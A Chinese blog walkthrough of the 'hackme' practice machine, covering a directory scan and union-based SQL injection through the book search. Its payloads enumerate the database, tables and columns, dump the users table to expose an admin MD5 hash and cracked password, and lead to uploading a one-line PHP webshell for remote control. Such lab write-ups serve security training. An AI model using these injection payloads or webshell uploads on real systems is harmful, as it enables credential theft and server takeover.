当前位置: 首页 > article >正文

hackme靶机通关攻略

article 2025/3/14 5:57:20
第一步:确定靶机IP

第二步:使用御剑后台扫描工具扫描敏感文件

第三步:访问register.php注册登录,进入welcome.php页面

第四步:访问一个不存在的页面,确定网站使用的中间件是Apache(无用)

第五步:返回welcome.php页面,单点search会出现很多书,推测存在SQL注入漏洞

第六步:确定闭合方式为单引号

第七步:判断字段数为3、判断回显位置

第八步:爆破数据库名、爆破表名、爆破字段名

#爆破数据库名
OSNT' union select database(),2,3#

#爆破表名
OSNT' union select 1,2,table_name from information_schema.tables where table_schema='webapphacking'#

#爆破字段名
OSNT' union select 1,2,column_name from information_schema.columns where table_name='users'#

#爆破敏感信息
OSNT' union select 1,2,group_concat(name,'~',pasword) from users#

#发现管理员账户
superadmin~2386acb2cf356944177746fc92523983

#MD5解密密码
Uncrackable
第九步:登录管理员账户,发现上传文件的地方,尝试直接上传一句话木马shellshellshell.php

第十步:访问http://192.168.0.107/uploads/,发现成功上传,使用蚁剑连接,成功!

                                                                                                                        FROM  IYU_


http://www.kler.cn/a/583748.html

相关文章:

  • 前端面试:cookie 可以实现不同域共享吗?
  • 利用Piwigo搭建轻量级的私人云相册实现照片的高效管理与便捷分享
  • hadoop第4课(WordCount)
  • AI硬件系统(一):计算范式
  • Spring Boot Tomcat 漏洞修复
  • GOF设计模式在 Spring 框架中的核心应用分析
  • 13. Pandas :使用 to_excel 方法写入 Excel文件
  • 【Repos系列】Bandersnatch同步原理
  • 计算机网络基础:探秘网络数据传输
  • C# NX二次开发:拉伸UFUN函数避坑指南
  • 压缩空气储能仿真simulink模型
  • 【高并发内存池】细节处理 + 性能优化 + 总结
  • 机器视觉工程师红外相机的选择:红外长波工业相机和短波红外工业相机玄机大总结
  • 力扣第585题
  • 51. HarmonyOS NEXT 登录模块开发教程(五):安全性考虑与最佳实践
  • Netty基础—基础网络协议
  • 深度学习模型试跑(十九):depth-anything-tensorrt(c++,vs2022版,点云)
  • npm学习
  • 1N4148数据手册:小信号二极管全面解析
  • 专访数势科技谭李:智能分析 Agent 打通数据平权的最后一公里